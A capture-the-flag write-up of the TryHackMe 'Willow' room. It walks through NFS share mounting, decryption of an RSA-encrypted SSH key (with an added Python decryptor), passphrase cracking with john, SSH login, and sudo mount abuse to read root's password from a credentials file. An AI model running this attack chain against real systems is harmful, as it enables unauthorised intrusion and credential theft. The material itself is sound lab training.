Willow — TryHackMe — WriteUp

TonyRahmos
4 min read, Nov 25, 2020

Hello. I’m Rahmos. Here is my Willow — TryHackMe — WriteUp. Check it out!

First, deploy the machine and nmap for opened ports:

nmap -A -T4 -p- -v <ip>

[screenshot: nmap scan results]

There are 4 ports opened: 22 (SSH), 80 (HTTP), 111 (RPC), and 2049 (NFS).

As nfs is running, let’s check what directory can be mounted:

showmount -e <ip>

[screenshot: showmount output]

So, /var/failsafe can be mounted by any computer on the network (the * indicates that). Let’s mount this folder to see what’s inside.

Follow these commands:

mkdir /tmp/willow

mount -t nfs 10.10.229.81:/var/failsafe /tmp/willow

Now cd to /tmp/willow to see what’s inside /var/failsafe:

[screenshot: listing of /tmp/willow]

And the content of “rsa_keys”:

[screenshot: contents of rsa_keys]

Well, up to now, I don’t know what those numbers mean, so just leave it there first.

Next, let’s access its website on port 80:

[screenshot: website on port 80]

So many numbers here! It looks like an encrypted string. I’ll use http://icyberchef.com/ to decrypt.

[screenshot: CyberChef output]

OK, the rest of the numbers are Willow’s private key, encrypted with the RSA algorithm. From the hint, I know the key format is:

Public Key: (e, n)

Private Key: (d, n)

Looking back at “rsa_keys”, I know what e, d and n are:

[screenshot: rsa_keys]

e: 23
d: 61527
n: 37267

And the format to decrypt:

decrypted = (encrypted ** d) % n

So, let’s write some simple code using the format above to decrypt this RSA. You can find my code here.
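An added example, not the author’s linked script (which is not on this page): a small Python decryptor for the formula above, with a check that the private exponent really inverts e modulo phi(n) before decrypting, so a mistyped d is caught instead of producing garbage. It assumes one ASCII character per number, as the room’s ciphertext uses; the demo key pair (p = 101, q = 113, e = 23) is constructed, and the room’s own e, d and n drop in the same way.

```python
import re
from math import gcd, isqrt


def parse_numbers(blob: str) -> list[int]:
    """Extract the decimal blocks from text such as the numbers shown on the web page."""
    return [int(tok) for tok in re.findall(r"\d+", blob)]


def factor_small_n(n: int) -> tuple[int, int]:
    """Trial division; only feasible because the room's modulus is a five-digit number."""
    for p in range(2, isqrt(n) + 1):
        if n % p == 0:
            return p, n // p
    raise ValueError("n has no small factor; cannot derive phi(n)")


def derive_d(e: int, n: int) -> int:
    """Private exponent from the public key alone, which is why such a tiny n is fatal."""
    p, q = factor_small_n(n)
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e is not invertible modulo phi(n)")
    return pow(e, -1, phi)  # modular inverse, Python 3.8+


def keypair_consistent(e: int, d: int, n: int) -> bool:
    """True when e*d == 1 (mod phi(n)); a mistyped d would otherwise decrypt to garbage."""
    p, q = factor_small_n(n)
    return (e * d) % ((p - 1) * (q - 1)) == 1


def rsa_encrypt_text(text: str, e: int, n: int) -> list[int]:
    """Textbook RSA, one ASCII code point per block (no padding, as in the room)."""
    return [pow(ord(ch), e, n) for ch in text]


def rsa_decrypt_blocks(blocks: list[int], d: int, n: int) -> str:
    """The page's formula decrypted = (encrypted ** d) % n, evaluated with the
    three-argument pow() so the exponentiation stays modular the whole way."""
    return "".join(chr(pow(c, d, n)) for c in blocks)


if __name__ == "__main__":
    # Constructed key pair for the demo: p = 101, q = 113, so n = 11413 and phi = 11200.
    E, N = 23, 11413
    D = derive_d(E, N)  # 487
    assert keypair_consistent(E, D, N)
    sample = " ".join(str(c) for c in rsa_encrypt_text("-----BEGIN RSA", E, N))
    print(rsa_decrypt_blocks(parse_numbers(sample), D, N))  # -----BEGIN RSA
```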

After running it, I’ve got the private key:

[screenshot: decrypted private key]

Now crack the password of this key using john:

ssh2john rsakey.txt > johnrsa.txt

john --wordlist=rockyou.txt johnrsa.txt

[screenshot: john output]

I’ve got the password. chmod 600 rsakey.txt to make the private key usable, then log in over SSH using the private key and the password above.

ssh -i rsakey.txt willow@<ip>

[screenshot: SSH login]

I’m in!

ls -al

There is a “user.jpg” inside willow’s home folder. It looks like it’ll be the 1st flag. Transfer it to your machine using scp. From your machine:

scp -i rsakey.txt willow@10.10.229.81:/home/willow/user.jpg /home/<your-username>

The image will be your flag!

[screenshot: user flag]

Now I’ll find a way to own root and get the final flag.

First, sudo -l to see if willow can run sudo:

Well, willow can run mount /dev/* without a password. So let’s see what’s inside /dev:

[screenshot: listing of /dev]

There’s a “hidden_backup” file. Let’s mount it under willow’s home to see what’s inside:

mkdir /home/willow/hidden && sudo mount /dev/hidden_backup /home/willow/hidden

[screenshot: contents of hidden_backup]

Well, there’s a “creds.txt” file. Inside it is root’s password! su root using this password and get the final flag!

[screenshot: root shell, /root/root.txt]

Oh wait! root.txt is not the final flag!
Wait a minute, I haven’t extracted anything from “user.jpg”, right? Maybe there’s something hidden in it! Let’s extract the hidden data using steghide:

steghide extract -sf user.jpg

Then enter root’s password as the passphrase and the hidden data is extracted! It will be your root flag.

[screenshot: root flag]

The end.

HAPPY HACKING
